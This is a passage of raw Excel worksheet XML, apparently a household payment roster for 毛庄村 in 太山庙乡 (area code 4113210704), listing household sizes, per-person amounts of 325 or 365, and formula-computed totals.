      <c r="B2125" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2125" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="D2125" s="24" t="s">
        <v>5631</v>
      </c>
      <c r="E2125" s="24" t="s">
        <v>3510</v>
      </c>
      <c r="F2125" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2125" s="24">
        <v>2</v>
      </c>
      <c r="H2125" s="25">
        <v>325</v>
      </c>
      <c r="I2125" s="24">
        <f t="shared" si="33"/>
        <v>650</v>
      </c>
      <c r="J2125" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2125" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2126" customHeight="1" spans="1:11">
      <c r="A2126" s="23" t="s">
        <v>5632</v>
      </c>
      <c r="B2126" s="24" t="str">
        <f>B2125</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2126" s="24" t="str">
        <f>C2125</f>
        <v>太山庙乡</v>
      </c>
      <c r="D2126" s="23" t="s">
        <v>5633</v>
      </c>
      <c r="E2126" s="23" t="s">
        <v>5411</v>
      </c>
      <c r="F2126" s="24">
        <f>F2125</f>
        <v>4113210704</v>
      </c>
      <c r="G2126" s="24"/>
      <c r="H2126" s="24"/>
      <c r="I2126" s="24">
        <f t="shared" si="33"/>
        <v>0</v>
      </c>
      <c r="J2126" s="24"/>
      <c r="K2126" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2127" customHeight="1" spans="1:11">
      <c r="A2127" s="23" t="s">
        <v>5634</v>
      </c>
      <c r="B2127" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2127" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2127" s="24" t="s">
        <v>5635</v>
      </c>
      <c r="E2127" s="24" t="s">
        <v>5425</v>
      </c>
      <c r="F2127" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2127" s="24">
        <v>1</v>
      </c>
      <c r="H2127" s="25">
        <v>365</v>
      </c>
      <c r="I2127" s="24">
        <f t="shared" si="33"/>
        <v>365</v>
      </c>
      <c r="J2127" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2127" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2128" customHeight="1" spans="1:11">
      <c r="A2128" s="23" t="s">
        <v>5636</v>
      </c>
      <c r="B2128" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2128" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="D2128" s="24" t="s">
        <v>5637</v>
      </c>
      <c r="E2128" s="24" t="s">
        <v>5414</v>
      </c>
      <c r="F2128" s="24" t="s">
        <v>5603</v>
      </c>
      <c r="G2128" s="24">
        <v>1</v>
      </c>
      <c r="H2128" s="25">
        <v>365</v>
      </c>
      <c r="I2128" s="24">
        <f t="shared" si="33"/>
        <v>365</v>
      </c>
      <c r="J2128" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2128" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2129" customHeight="1" spans="1:11">
      <c r="A2129" s="23" t="s">
        <v>5638</v>
      </c>
      <c r="B2129" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2129" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2129" s="24" t="s">
        <v>5639</v>
      </c>
      <c r="E2129" s="24" t="s">
        <v>5566</v>
      </c>
      <c r="F2129" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2129" s="24">
        <v>1</v>
      </c>
      <c r="H2129" s="25">
        <v>365</v>
      </c>
      <c r="I2129" s="24">
        <f t="shared" si="33"/>
        <v>365</v>
      </c>
      <c r="J2129" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2129" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2130" customHeight="1" spans="1:11">
      <c r="A2130" s="23" t="s">
        <v>5640</v>
      </c>
      <c r="B2130" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2130" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2130" s="24" t="s">
        <v>5641</v>
      </c>
      <c r="E2130" s="24" t="s">
        <v>5406</v>
      </c>
      <c r="F2130" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2130" s="24">
        <v>2</v>
      </c>
      <c r="H2130" s="25">
        <v>325</v>
      </c>
      <c r="I2130" s="24">
        <f t="shared" si="33"/>
        <v>650</v>
      </c>
      <c r="J2130" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2130" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2131" customHeight="1" spans="1:11">
      <c r="A2131" s="23" t="s">
        <v>5642</v>
      </c>
      <c r="B2131" s="24" t="str">
        <f>B2130</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2131" s="24" t="str">
        <f>C2130</f>
        <v>毛庄村</v>
      </c>
      <c r="D2131" s="23" t="s">
        <v>5643</v>
      </c>
      <c r="E2131" s="23" t="s">
        <v>5360</v>
      </c>
      <c r="F2131" s="24">
        <f>F2130</f>
        <v>4113210704</v>
      </c>
      <c r="G2131" s="24"/>
      <c r="H2131" s="24"/>
      <c r="I2131" s="24">
        <f t="shared" si="33"/>
        <v>0</v>
      </c>
      <c r="J2131" s="24"/>
      <c r="K2131" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2132" customHeight="1" spans="1:11">
      <c r="A2132" s="23" t="s">
        <v>5644</v>
      </c>
      <c r="B2132" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2132" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2132" s="24" t="s">
        <v>5645</v>
      </c>
      <c r="E2132" s="24" t="s">
        <v>5646</v>
      </c>
      <c r="F2132" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2132" s="24">
        <v>1</v>
      </c>
      <c r="H2132" s="25">
        <v>365</v>
      </c>
      <c r="I2132" s="24">
        <f t="shared" si="33"/>
        <v>365</v>
      </c>
      <c r="J2132" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2132" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2133" customHeight="1" spans="1:11">
      <c r="A2133" s="23" t="s">
        <v>5647</v>
      </c>
      <c r="B2133" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2133" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2133" s="24" t="s">
        <v>5648</v>
      </c>
      <c r="E2133" s="24" t="s">
        <v>5649</v>
      </c>
      <c r="F2133" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2133" s="24">
        <v>1</v>
      </c>
      <c r="H2133" s="25">
        <v>365</v>
      </c>
      <c r="I2133" s="24">
        <f t="shared" si="33"/>
        <v>365</v>
      </c>
      <c r="J2133" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2133" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2134" customHeight="1" spans="1:11">
      <c r="A2134" s="23" t="s">
        <v>5650</v>
      </c>
      <c r="B2134" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2134" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2134" s="24" t="s">
        <v>5651</v>
      </c>
      <c r="E2134" s="24" t="s">
        <v>5467</v>
      </c>
      <c r="F2134" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2134" s="24">
        <v>1</v>
      </c>
      <c r="H2134" s="25">
        <v>365</v>
      </c>
      <c r="I2134" s="24">
        <f t="shared" si="33"/>
        <v>365</v>
      </c>
      <c r="J2134" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2134" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2135" customHeight="1" spans="1:11">
      <c r="A2135" s="23" t="s">
        <v>5652</v>
      </c>
      <c r="B2135" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2135" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2135" s="24" t="s">
        <v>5653</v>
      </c>
      <c r="E2135" s="24" t="s">
        <v>5520</v>
      </c>
      <c r="F2135" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2135" s="24">
        <v>1</v>
      </c>
      <c r="H2135" s="25">
        <v>365</v>
      </c>
      <c r="I2135" s="24">
        <f t="shared" si="33"/>
        <v>365</v>
      </c>
      <c r="J2135" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2135" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2136" customHeight="1" spans="1:11">
      <c r="A2136" s="23" t="s">
        <v>5654</v>
      </c>
      <c r="B2136" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2136" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2136" s="24" t="s">
        <v>5655</v>
      </c>
      <c r="E2136" s="24" t="s">
        <v>5496</v>
      </c>
      <c r="F2136" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2136" s="24">
        <v>1</v>
      </c>
      <c r="H2136" s="25">
        <v>365</v>
      </c>
      <c r="I2136" s="24">
        <f t="shared" si="33"/>
        <v>365</v>
      </c>
      <c r="J2136" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2136" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2137" customHeight="1" spans="1:11">
      <c r="A2137" s="23" t="s">
        <v>5656</v>
      </c>
      <c r="B2137" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2137" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2137" s="24" t="s">
        <v>5657</v>
      </c>
      <c r="E2137" s="24" t="s">
        <v>5520</v>
      </c>
      <c r="F2137" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2137" s="24">
        <v>1</v>
      </c>
      <c r="H2137" s="25">
        <v>365</v>
      </c>
      <c r="I2137" s="24">
        <f t="shared" si="33"/>
        <v>365</v>
      </c>
      <c r="J2137" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2137" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2138" customHeight="1" spans="1:11">
      <c r="A2138" s="23" t="s">
        <v>5658</v>
      </c>
      <c r="B2138" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2138" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2138" s="24" t="s">
        <v>5659</v>
      </c>
      <c r="E2138" s="24" t="s">
        <v>5535</v>
      </c>
      <c r="F2138" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2138" s="24">
        <v>2</v>
      </c>
      <c r="H2138" s="25">
        <v>325</v>
      </c>
      <c r="I2138" s="24">
        <f t="shared" si="33"/>
        <v>650</v>
      </c>
      <c r="J2138" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2138" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2139" customHeight="1" spans="1:11">
      <c r="A2139" s="23" t="s">
        <v>5660</v>
      </c>
      <c r="B2139" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2139" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2139" s="24" t="s">
        <v>5661</v>
      </c>
      <c r="E2139" s="24" t="s">
        <v>5411</v>
      </c>
      <c r="F2139" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2139" s="24"/>
      <c r="I2139" s="24">
        <f t="shared" si="33"/>
        <v>0</v>
      </c>
      <c r="J2139" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2139" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2140" customHeight="1" spans="1:11">
      <c r="A2140" s="23" t="s">
        <v>5662</v>
      </c>
      <c r="B2140" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2140" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2140" s="24" t="s">
        <v>5663</v>
      </c>
      <c r="E2140" s="24" t="s">
        <v>5520</v>
      </c>
      <c r="F2140" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2140" s="24">
        <v>1</v>
      </c>
      <c r="H2140" s="25">
        <v>365</v>
      </c>
      <c r="I2140" s="24">
        <f t="shared" si="33"/>
        <v>365</v>
      </c>
      <c r="J2140" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2140" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2141" customHeight="1" spans="1:11">
      <c r="A2141" s="23" t="s">
        <v>5664</v>
      </c>
      <c r="B2141" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2141" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="D2141" s="24" t="s">
        <v>5665</v>
      </c>
      <c r="E2141" s="24" t="s">
        <v>5666</v>
      </c>
      <c r="F2141" s="24" t="s">
        <v>5603</v>
      </c>
      <c r="G2141" s="24">
        <v>1</v>
      </c>
      <c r="H2141" s="25">
        <v>365</v>
      </c>
      <c r="I2141" s="24">
        <f t="shared" si="33"/>
        <v>365</v>
      </c>
      <c r="J2141" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2141" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2142" customHeight="1" spans="1:11">
      <c r="A2142" s="23" t="s">
        <v>5667</v>
      </c>
      <c r="B2142" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2142" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2142" s="23" t="s">
        <v>5668</v>
      </c>
      <c r="E2142" s="32" t="s">
        <v>5479</v>
      </c>
      <c r="F2142" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2142" s="24">
        <v>1</v>
      </c>
      <c r="H2142" s="25">
        <v>365</v>
      </c>
      <c r="I2142" s="24">
        <f t="shared" si="33"/>
        <v>365</v>
      </c>
      <c r="J2142" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2142" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2143" customHeight="1" spans="1:11">
      <c r="A2143" s="23" t="s">
        <v>5669</v>
      </c>
      <c r="B2143" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2143" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2143" s="24" t="s">
        <v>5670</v>
      </c>
      <c r="E2143" s="24" t="s">
        <v>5422</v>
      </c>
      <c r="F2143" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2143" s="24">
        <v>2</v>
      </c>
      <c r="H2143" s="25">
        <v>325</v>
      </c>
      <c r="I2143" s="24">
        <f t="shared" si="33"/>
        <v>650</v>
      </c>
      <c r="J2143" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2143" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2144" customHeight="1" spans="1:11">
      <c r="A2144" s="23" t="s">
        <v>5671</v>
      </c>
      <c r="B2144" s="24" t="str">
        <f>B2143</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2144" s="24" t="str">
        <f>C2143</f>
        <v>毛庄村</v>
      </c>
      <c r="D2144" s="23" t="s">
        <v>5672</v>
      </c>
      <c r="E2144" s="23" t="s">
        <v>5673</v>
      </c>
      <c r="F2144" s="24">
        <f>F2143</f>
        <v>4113210704</v>
      </c>
      <c r="G2144" s="24"/>
      <c r="H2144" s="24"/>
      <c r="I2144" s="24">
        <f t="shared" si="33"/>
        <v>0</v>
      </c>
      <c r="J2144" s="24"/>
      <c r="K2144" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2145" customHeight="1" spans="1:11">
      <c r="A2145" s="23" t="s">
        <v>5674</v>
      </c>
      <c r="B2145" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2145" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2145" s="24" t="s">
        <v>5675</v>
      </c>
      <c r="E2145" s="24" t="s">
        <v>5676</v>
      </c>
      <c r="F2145" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2145" s="24">
        <v>2</v>
      </c>
      <c r="H2145" s="25">
        <v>325</v>
      </c>
      <c r="I2145" s="24">
        <f t="shared" si="33"/>
        <v>650</v>
      </c>
      <c r="J2145" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2145" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2146" customHeight="1" spans="1:11">
      <c r="A2146" s="23" t="s">
        <v>5677</v>
      </c>
      <c r="B2146" s="24" t="str">
        <f>B2145</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2146" s="24" t="str">
        <f>C2145</f>
        <v>毛庄村</v>
      </c>
      <c r="D2146" s="23" t="s">
        <v>5678</v>
      </c>
      <c r="E2146" s="23" t="s">
        <v>5679</v>
      </c>
      <c r="F2146" s="24">
        <f>F2145</f>
        <v>4113210704</v>
      </c>
      <c r="G2146" s="24"/>
      <c r="H2146" s="24"/>
      <c r="I2146" s="24">
        <f t="shared" si="33"/>
        <v>0</v>
      </c>
      <c r="J2146" s="24"/>
      <c r="K2146" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2147" customHeight="1" spans="1:11">
      <c r="A2147" s="23" t="s">
        <v>5680</v>
      </c>
      <c r="B2147" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2147" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2147" s="24" t="s">
        <v>5681</v>
      </c>
      <c r="E2147" s="24" t="s">
        <v>5470</v>
      </c>
      <c r="F2147" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2147" s="24">
        <v>2</v>
      </c>
      <c r="H2147" s="25">
        <v>325</v>
      </c>
      <c r="I2147" s="24">
        <f t="shared" si="33"/>
        <v>650</v>
      </c>
      <c r="J2147" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2147" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2148" customHeight="1" spans="1:11">
      <c r="A2148" s="23" t="s">
        <v>5682</v>
      </c>
      <c r="B2148" s="24" t="str">
        <f>B2147</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2148" s="24" t="str">
        <f>C2147</f>
        <v>毛庄村</v>
      </c>
      <c r="D2148" s="23" t="s">
        <v>5683</v>
      </c>
      <c r="E2148" s="23" t="s">
        <v>5684</v>
      </c>
      <c r="F2148" s="24">
        <f>F2147</f>
        <v>4113210704</v>
      </c>
      <c r="G2148" s="24"/>
      <c r="H2148" s="24"/>
      <c r="I2148" s="24">
        <f t="shared" si="33"/>
        <v>0</v>
      </c>
      <c r="J2148" s="24"/>
      <c r="K2148" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2149" customHeight="1" spans="1:11">
      <c r="A2149" s="23" t="s">
        <v>5685</v>
      </c>
      <c r="B2149" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2149" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2149" s="24" t="s">
        <v>5686</v>
      </c>
      <c r="E2149" s="24" t="s">
        <v>5517</v>
      </c>
      <c r="F2149" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2149" s="24">
        <v>2</v>
      </c>
      <c r="H2149" s="25">
        <v>325</v>
      </c>
      <c r="I2149" s="24">
        <f t="shared" si="33"/>
        <v>650</v>
      </c>
      <c r="J2149" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2149" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2150" customHeight="1" spans="1:11">
      <c r="A2150" s="23" t="s">
        <v>5687</v>
      </c>
      <c r="B2150" s="24" t="str">
        <f>B2149</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2150" s="24" t="str">
        <f>C2149</f>
        <v>毛庄村</v>
      </c>
      <c r="D2150" s="23" t="s">
        <v>5688</v>
      </c>
      <c r="E2150" s="32" t="s">
        <v>5520</v>
      </c>
      <c r="F2150" s="24">
        <f>F2149</f>
        <v>4113210704</v>
      </c>
      <c r="G2150" s="24"/>
      <c r="H2150" s="24"/>
      <c r="I2150" s="24">
        <f t="shared" si="33"/>
        <v>0</v>
      </c>
      <c r="J2150" s="24"/>
      <c r="K2150" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2151" customHeight="1" spans="1:11">
      <c r="A2151" s="23" t="s">
        <v>5689</v>
      </c>
      <c r="B2151" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2151" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2151" s="24" t="s">
        <v>5690</v>
      </c>
      <c r="E2151" s="24" t="s">
        <v>5691</v>
      </c>
      <c r="F2151" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2151" s="24">
        <v>1</v>
      </c>
      <c r="H2151" s="25">
        <v>365</v>
      </c>
      <c r="I2151" s="24">
        <f t="shared" si="33"/>
        <v>365</v>
      </c>
      <c r="J2151" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2151" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2152" customHeight="1" spans="1:11">
      <c r="A2152" s="23" t="s">
        <v>5692</v>
      </c>
      <c r="B2152" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2152" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2152" s="24" t="s">
        <v>5693</v>
      </c>
      <c r="E2152" s="24" t="s">
        <v>5015</v>
      </c>
      <c r="F2152" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2152" s="24">
        <v>1</v>
      </c>
      <c r="H2152" s="25">
        <v>365</v>
      </c>
      <c r="I2152" s="24">
        <f t="shared" si="33"/>
        <v>365</v>
      </c>
      <c r="J2152" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2152" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2153" customHeight="1" spans="1:11">
      <c r="A2153" s="23" t="s">
        <v>5694</v>
      </c>
      <c r="B2153" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2153" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2153" s="24" t="s">
        <v>5695</v>
      </c>
      <c r="E2153" s="24" t="s">
        <v>5646</v>
      </c>
      <c r="F2153" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2153" s="24">
        <v>1</v>
      </c>
      <c r="H2153" s="25">
        <v>365</v>
      </c>
      <c r="I2153" s="24">
        <f t="shared" si="33"/>
        <v>365</v>
      </c>
      <c r="J2153" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2153" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2154" customHeight="1" spans="1:11">
      <c r="A2154" s="23" t="s">
        <v>5696</v>
      </c>
      <c r="B2154" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2154" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2154" s="24" t="s">
        <v>5697</v>
      </c>
      <c r="E2154" s="24" t="s">
        <v>5419</v>
      </c>
      <c r="F2154" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2154" s="24">
        <v>1</v>
      </c>
      <c r="H2154" s="25">
        <v>365</v>
      </c>
      <c r="I2154" s="24">
        <f t="shared" si="33"/>
        <v>365</v>
      </c>
      <c r="J2154" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2154" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2155" customHeight="1" spans="1:11">
      <c r="A2155" s="23" t="s">
        <v>5698</v>
      </c>
      <c r="B2155" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2155" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2155" s="24" t="s">
        <v>5699</v>
      </c>
      <c r="E2155" s="24" t="s">
        <v>5504</v>
      </c>
      <c r="F2155" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2155" s="24">
        <v>1</v>
      </c>
      <c r="H2155" s="25">
        <v>365</v>
      </c>
      <c r="I2155" s="24">
        <f t="shared" si="33"/>
        <v>365</v>
      </c>
      <c r="J2155" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2155" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2156" customHeight="1" spans="1:11">
      <c r="A2156" s="23" t="s">
        <v>5700</v>
      </c>
      <c r="B2156" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2156" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2156" s="24" t="s">
        <v>5701</v>
      </c>
      <c r="E2156" s="24" t="s">
        <v>5450</v>
      </c>
      <c r="F2156" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2156" s="24">
        <v>1</v>
      </c>
      <c r="H2156" s="25">
        <v>365</v>
      </c>
      <c r="I2156" s="24">
        <f t="shared" si="33"/>
        <v>365</v>
      </c>
      <c r="J2156" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2156" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2157" customHeight="1" spans="1:11">
      <c r="A2157" s="23" t="s">
        <v>5702</v>
      </c>
      <c r="B2157" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2157" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2157" s="24" t="s">
        <v>5703</v>
      </c>
      <c r="E2157" s="24" t="s">
        <v>5447</v>
      </c>
      <c r="F2157" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2157" s="24">
        <v>1</v>
      </c>
      <c r="H2157" s="25">
        <v>365</v>
      </c>
      <c r="I2157" s="24">
        <f t="shared" si="33"/>
        <v>365</v>
      </c>
      <c r="J2157" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2157" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2158" customHeight="1" spans="1:11">
      <c r="A2158" s="23" t="s">
        <v>5704</v>
      </c>
      <c r="B2158" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2158" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2158" s="24" t="s">
        <v>5705</v>
      </c>
      <c r="E2158" s="24" t="s">
        <v>2233</v>
      </c>
      <c r="F2158" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2158" s="24">
        <v>2</v>
      </c>
      <c r="H2158" s="25">
        <v>325</v>
      </c>
      <c r="I2158" s="24">
        <f t="shared" si="33"/>
        <v>650</v>
      </c>
      <c r="J2158" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2158" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2159" customHeight="1" spans="1:11">
      <c r="A2159" s="23" t="s">
        <v>5706</v>
      </c>
      <c r="B2159" s="24" t="str">
        <f>B2158</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2159" s="24" t="str">
        <f>C2158</f>
        <v>毛庄村</v>
      </c>
      <c r="D2159" s="23" t="s">
        <v>5707</v>
      </c>
      <c r="E2159" s="23" t="s">
        <v>5380</v>
      </c>
      <c r="F2159" s="24">
        <f>F2158</f>
        <v>4113210704</v>
      </c>
      <c r="G2159" s="24"/>
      <c r="H2159" s="24"/>
      <c r="I2159" s="24">
        <f t="shared" si="33"/>
        <v>0</v>
      </c>
      <c r="J2159" s="24"/>
      <c r="K2159" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2160" customHeight="1" spans="1:11">
      <c r="A2160" s="23" t="s">
        <v>5708</v>
      </c>
      <c r="B2160" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2160" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2160" s="24" t="s">
        <v>5709</v>
      </c>
      <c r="E2160" s="24" t="s">
        <v>5493</v>
      </c>
      <c r="F2160" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2160" s="24">
        <v>2</v>
      </c>
      <c r="H2160" s="25">
        <v>325</v>
      </c>
      <c r="I2160" s="24">
        <f t="shared" si="33"/>
        <v>650</v>
      </c>
      <c r="J2160" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2160" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2161" customHeight="1" spans="1:11">
      <c r="A2161" s="23" t="s">
        <v>5710</v>
      </c>
      <c r="B2161" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2161" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2161" s="24" t="s">
        <v>5711</v>
      </c>
      <c r="E2161" s="24" t="s">
        <v>5419</v>
      </c>
      <c r="F2161" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2161" s="24"/>
      <c r="I2161" s="24">
        <f t="shared" si="33"/>
        <v>0</v>
      </c>
      <c r="J2161" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2161" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2162" customHeight="1" spans="1:11">
      <c r="A2162" s="23" t="s">
        <v>5712</v>
      </c>
      <c r="B2162" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2162" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2162" s="24" t="s">
        <v>5713</v>
      </c>
      <c r="E2162" s="24" t="s">
        <v>5403</v>
      </c>
      <c r="F2162" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2162" s="24">
        <v>2</v>
      </c>
      <c r="H2162" s="25">
        <v>325</v>
      </c>
      <c r="I2162" s="24">
        <f t="shared" si="33"/>
        <v>650</v>
      </c>
      <c r="J2162" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2162" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2163" customHeight="1" spans="1:11">
      <c r="A2163" s="23" t="s">
        <v>5714</v>
      </c>
      <c r="B2163" s="24" t="str">
        <f>B2162</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2163" s="24" t="str">
        <f>C2162</f>
        <v>毛庄村</v>
      </c>
      <c r="D2163" s="23" t="s">
        <v>5715</v>
      </c>
      <c r="E2163" s="23" t="s">
        <v>5355</v>
      </c>
      <c r="F2163" s="24">
        <f>F2162</f>
        <v>4113210704</v>
      </c>
      <c r="G2163" s="24"/>
      <c r="H2163" s="24"/>
      <c r="I2163" s="24">
        <f t="shared" si="33"/>
        <v>0</v>
      </c>
      <c r="J2163" s="24"/>
      <c r="K2163" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2164" customHeight="1" spans="1:11">
